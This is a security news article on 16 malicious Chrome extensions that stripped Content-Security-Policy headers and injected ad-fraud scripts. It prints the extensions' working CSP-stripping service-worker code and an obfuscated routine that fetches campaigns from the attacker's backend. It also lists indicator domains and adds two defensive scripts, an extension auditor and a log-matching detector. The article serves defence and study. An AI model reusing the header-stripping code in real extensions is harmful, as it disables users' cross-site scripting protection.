16 Malicious Chrome Extensions Infected Over 3.2 Million Users


A coordinated campaign involving at least 16 malicious Chrome extensions infected over 3.2 million users worldwide, abusing extension privileges to weaken browser security protections and carry out advertising fraud and search engine optimization manipulation.

Discovered by GitLab Threat Intelligence in February 2025, these extensions, ranging from screen capture tools to ad blockers, hijacked user sessions, stripped critical security protections, and injected obfuscated payloads to manipulate browsing behavior.

Despite their removal from the Chrome Web Store, lingering risks persist for those who haven’t manually uninstalled the extensions.

GitLab's analysts found that the campaign's technical sophistication centered on degrading browser security through Content Security Policy (CSP) manipulation.

Anatomy of the Attack: Content Security Policy Stripping

Malicious extensions such as Nimble Capture and KProxy deployed service workers that stripped CSP headers, a critical defense against cross-site scripting, from up to 2,000 sites visited per session (the rule IDs wrap, so older rules are overwritten as new sites are visited).

The code below demonstrates how the threat actor leveraged Chrome’s declarativeNetRequest API to nullify CSP protections:

// Service-worker state not shown in the excerpt: hostnames already handled,
// and a rolling rule id that wraps so only ~2,000 rules are ever live.
const i = [];
let s = 0;

async function u(e) {
    if (!(i.indexOf(e) > -1)) {                 // one rule per hostname
        i.push(e);
        try {
            // Wrap the rule id at 1999 so the oldest rules get replaced
            return s > 1999 && (s = 1), s++, chrome.declarativeNetRequest.updateDynamicRules({
                addRules: [{
                    id: s,
                    action: {
                        type: "modifyHeaders",
                        responseHeaders: [{
                            header: "content-security-policy",
                            operation: "set",
                            value: ""               // an empty policy enforces nothing
                        }]
                    },
                    condition: {
                        urlFilter: e,               // hostname passed by the caller
                        resourceTypes: ["main_frame", "sub_frame"]
                    }
                }],
                removeRuleIds: [s]                  // removals are applied before additions
            })
        } catch (t) {}
    }
}

By disabling CSP, the attackers created a permissive environment for injecting scripts. The extensions then connected to configuration servers (api.nimblecapture[.]com) to fetch obfuscated JavaScript payloads.
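To make the pattern above concrete from the defender's side, here is an added example (my code, not GitLab's analysis tooling and not code from any of the extensions) that statically triages an unpacked extension for the same technique: a declarativeNetRequest permission paired with broad host access, static rule files that blank or remove security headers, and scripts that call updateDynamicRules while referencing a security-header literal. The function names, the two sample extensions and their manifests, rule files and scripts are all constructed for this example.

```javascript
// Added example: static triage of an unpacked Chrome extension for the
// CSP-stripping pattern. All inputs below are constructed, not real extensions.

// Response headers whose removal or blanking weakens the page's defences.
const SECURITY_HEADERS = new Set([
  "content-security-policy",
  "content-security-policy-report-only",
  "x-frame-options",
  "strict-transport-security",
]);

// Host patterns that grant access to every site.
const BROAD_HOSTS = new Set(["<all_urls>", "*://*/*", "http://*/*", "https://*/*"]);

// True when a modifyHeaders entry removes a security header or sets it to an
// empty value (an empty CSP enforces nothing, which is what the malware relies on).
function neutralizesHeader(mod) {
  const name = String(mod.header || "").toLowerCase();
  if (!SECURITY_HEADERS.has(name)) return false;
  if (mod.operation === "remove") return true;
  return mod.operation === "set" && String(mod.value ?? "").trim() === "";
}

// Static rule files (declarative_net_request.rule_resources) are plain JSON arrays.
function auditRules(rules, file) {
  const findings = [];
  for (const rule of rules) {
    if (rule.action?.type !== "modifyHeaders") continue;
    for (const mod of rule.action.responseHeaders || []) {
      if (neutralizesHeader(mod)) {
        findings.push({
          severity: "high",
          where: file,
          detail: `rule ${rule.id} ${mod.operation}s ${mod.header} for ${rule.condition?.urlFilter ?? "*"}`,
        });
      }
    }
  }
  return findings;
}

// MV2 keeps host patterns in "permissions"; MV3 moves them to "host_permissions".
function auditManifest(manifest) {
  const perms = manifest.permissions || [];
  const hosts = [...(manifest.host_permissions || []), ...perms];
  const hasDNR = perms.some((p) => String(p).startsWith("declarativeNetRequest"));
  const broad = hosts.some((h) => BROAD_HOSTS.has(h));
  if (!(hasDNR && broad)) return [];
  return [{
    severity: "medium",
    where: "manifest.json",
    detail: "declarativeNetRequest with broad host access can rewrite response headers on any site",
  }];
}

// Dynamic rules never appear in rule files, so look for the API call and a
// security-header literal in the same script (a heuristic, not a parser).
function auditScript(file, source) {
  const lower = source.toLowerCase();
  const usesDynamic = /declarativenetrequest\.update(dynamic|session)rules/.test(lower);
  const header = [...SECURITY_HEADERS].find((h) => lower.includes(`"${h}"`) || lower.includes(`'${h}'`));
  if (!(usesDynamic && header)) return [];
  return [{ severity: "high", where: file, detail: `dynamic rule update referencing ${header}` }];
}

// ext = { manifest, ruleFiles: {name: rules[]}, scripts: {name: source} }
function auditExtension(ext) {
  const findings = auditManifest(ext.manifest);
  for (const [file, rules] of Object.entries(ext.ruleFiles || {})) findings.push(...auditRules(rules, file));
  for (const [file, src] of Object.entries(ext.scripts || {})) findings.push(...auditScript(file, src));
  return findings;
}

// Constructed sample mirroring the pattern described in the article.
const SUSPECT_EXTENSION = {
  manifest: { manifest_version: 3, name: "Example Capture", permissions: ["declarativeNetRequest", "storage"], host_permissions: ["<all_urls>"] },
  ruleFiles: {
    "rules.json": [{
      id: 1,
      action: { type: "modifyHeaders", responseHeaders: [{ header: "Content-Security-Policy", operation: "set", value: "" }] },
      condition: { urlFilter: "example.com", resourceTypes: ["main_frame"] },
    }],
  },
  scripts: {
    "sw.js": 'chrome.declarativeNetRequest.updateDynamicRules({ addRules: [{ id: 1, action: { type: "modifyHeaders", responseHeaders: [{ header: "content-security-policy", operation: "set", value: "" }] }, condition: { urlFilter: host } }] });',
  },
};

// Constructed benign extension: an ad blocker that only blocks requests.
const BENIGN_EXTENSION = {
  manifest: { manifest_version: 3, name: "Example Blocker", permissions: ["declarativeNetRequest"], host_permissions: ["<all_urls>"] },
  ruleFiles: { "rules.json": [{ id: 1, action: { type: "block" }, condition: { urlFilter: "ads.example", resourceTypes: ["script"] } }] },
  scripts: { "sw.js": "chrome.runtime.onInstalled.addListener(() => {});" },
};

for (const f of auditExtension(SUSPECT_EXTENSION)) console.log(`[${f.severity}] ${f.where}: ${f.detail}`);
```

Run it with node. Note that the manifest finding alone is not conclusive: a legitimate ad blocker needs exactly the same permission pair, which is why only the rule and script checks carry the high severity. The script check is a text heuristic; obfuscated code that builds the header name at runtime will slip past it, so treat it as a first pass before reading the service worker by hand.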

These payloads, such as rcx-cd-v3.js, established bidirectional communication channels between victims’ browsers and the attackers’ infrastructure hosted on Bunny CDN and DigitalOcean Apps.

A unique x-do-app-origin header (978bc8ed-09a8-444b-9142-df5a19366612) tied all traffic to a single Express application.

The threat actor employed a multi-stage delivery chain. After disabling CSP, extensions loaded malicious configurations containing dynamically generated UUIDs and hashed hostnames.

For example, the initialSet function in Nimble Capture injected a remote script (rcx-cd-v3.js) into web pages, which then bridged Chrome’s privileged APIs (chrome.declarativeNetRequest) to page contexts.

This allowed the attackers to:

  1. Modify ad display rules to prioritize fraudulent ads.
  2. Block analytics services like Microsoft Clarity.
  3. Redirect affiliate traffic to domains such as AliExpress and Surfshark using injected iframes.

A geo-targeted routine from the same payload requests a campaign from the backend only when a visitor in Germany, France or the United Kingdom is on an Amazon domain (helper names are obfuscated in the original):

async function YOKoc() {
    let sKBoc = await vsRead("s");           // read persisted state (unused in this excerpt)
    // Only act for DE/FR/GB visitors on Amazon properties
    if (["DE", "FR", "GB"].includes(getGeo()) && getDomain().indexOf("amazon") > -1) {
        await Eftnc();                       // obfuscated helper
        // Fetch the campaign definition from the attacker backend
        let MZfpc = await ceqnc("/exporter/get-campaign", { /* ... */ });
        if (MZfpc) gVWoc(MZfpc.d);           // hand the campaign payload to the obfuscated handler
    }
}

The injected scripts also harvested browsing histories and session cookies, potentially exposing credentials and sensitive data.

Reviews from users of the malicious extensions (Source – GitLab)

Reviews from impacted users described unexpected redirects and performance degradation, hallmarks of these scripts' operations.

This campaign highlights systemic vulnerabilities in browser extension ecosystems. By compromising existing extensions through developer account takeovers – not code exploits – the attackers bypassed Google’s security reviews.

Organizations should audit extension permissions, especially broad host access, and monitor for unusual network traffic to domains such as blipshotextension[.]com or kproxyservers[.]site. For individuals, caution when granting broad permissions remains critical.
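For the network-monitoring side of that recommendation, here is an added example (my code, not a GitLab or vendor detection rule) that runs the indicators quoted in this article over proxy log records: the configuration and command domains, the rcx-cd-v3.js and /exporter/get-campaign paths, and the x-do-app-origin value. The JSON-lines log format, the field names (ts, src, host, uri, resp_headers), the function names and every record in the sample log are constructed for this example; the cdn.example.net host stands in for the real CDN hostname, which the article does not give.

```javascript
// Added example: triage proxy log records against the indicators quoted in
// the article. Log format and records are constructed, not real telemetry.

// Indicators kept defanged at rest and refanged for matching.
const IOC_HOSTS = ["api.nimblecapture[.]com", "blipshotextension[.]com", "kproxyservers[.]site"];
const IOC_PATHS = ["/rcx-cd-v3.js", "/exporter/get-campaign"];
const IOC_APP_ORIGIN = "978bc8ed-09a8-444b-9142-df5a19366612";

const refang = (s) => s.replace(/\[\.\]/g, ".");
const iocHosts = IOC_HOSTS.map(refang);

// Returns one hit label per matching indicator on a single record.
// A record is { ts, src, host, uri, resp_headers } as a proxy that logs
// response headers might emit (assumed format).
function triageRecord(rec) {
  const hits = [];
  const host = String(rec.host || "").toLowerCase();
  const uri = String(rec.uri || "");
  const hdrs = Object.fromEntries(
    Object.entries(rec.resp_headers || {}).map(([k, v]) => [k.toLowerCase(), v]),
  );
  // Exact host or any subdomain of an indicator domain
  if (iocHosts.some((h) => host === h || host.endsWith("." + h))) hits.push(`ioc-host:${host}`);
  // Payload and campaign endpoints regardless of which host serves them
  if (IOC_PATHS.some((p) => uri.endsWith(p))) hits.push(`ioc-path:${uri}`);
  // Response header value that tied the campaign traffic to one backend app
  if (hdrs["x-do-app-origin"] === IOC_APP_ORIGIN) hits.push("ioc-app-origin");
  return hits;
}

// Walks JSON-lines input, skipping blank or malformed lines rather than failing.
function triageLog(lines) {
  const alerts = [];
  for (const line of lines) {
    if (!line.trim()) continue;
    let rec;
    try { rec = JSON.parse(line); } catch { continue; }
    const hits = triageRecord(rec);
    if (hits.length) alerts.push({ ts: rec.ts, src: rec.src, host: rec.host, hits });
  }
  return alerts;
}

// Constructed sample log (JSON lines), including one malformed line.
const SAMPLE_LOG = [
  JSON.stringify({ ts: "2025-02-20T09:00:01Z", src: "10.0.0.12", host: "www.example.com", uri: "/", resp_headers: { "content-type": "text/html" } }),
  JSON.stringify({ ts: "2025-02-20T09:00:02Z", src: "10.0.0.12", host: "api.nimblecapture.com", uri: "/config", resp_headers: { "content-type": "application/json" } }),
  JSON.stringify({ ts: "2025-02-20T09:00:03Z", src: "10.0.0.12", host: "cdn.example.net", uri: "/static/rcx-cd-v3.js", resp_headers: { "content-type": "text/javascript", "X-Do-App-Origin": IOC_APP_ORIGIN } }),
  "not json at all",
  JSON.stringify({ ts: "2025-02-20T09:00:05Z", src: "10.0.0.7", host: "www.amazon.de", uri: "/dp/B000", resp_headers: {} }),
].join("\n");

for (const a of triageLog(SAMPLE_LOG.split("\n"))) console.log(a.ts, a.src, a.host, a.hits.join(" "));
```

Matching on the path and the x-do-app-origin value is what catches the payload fetch even when the CDN hostname is not on a blocklist; the domain match alone would have missed the third record. Expect the domains to rotate, so treat the path and header indicators as the more durable of the three.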
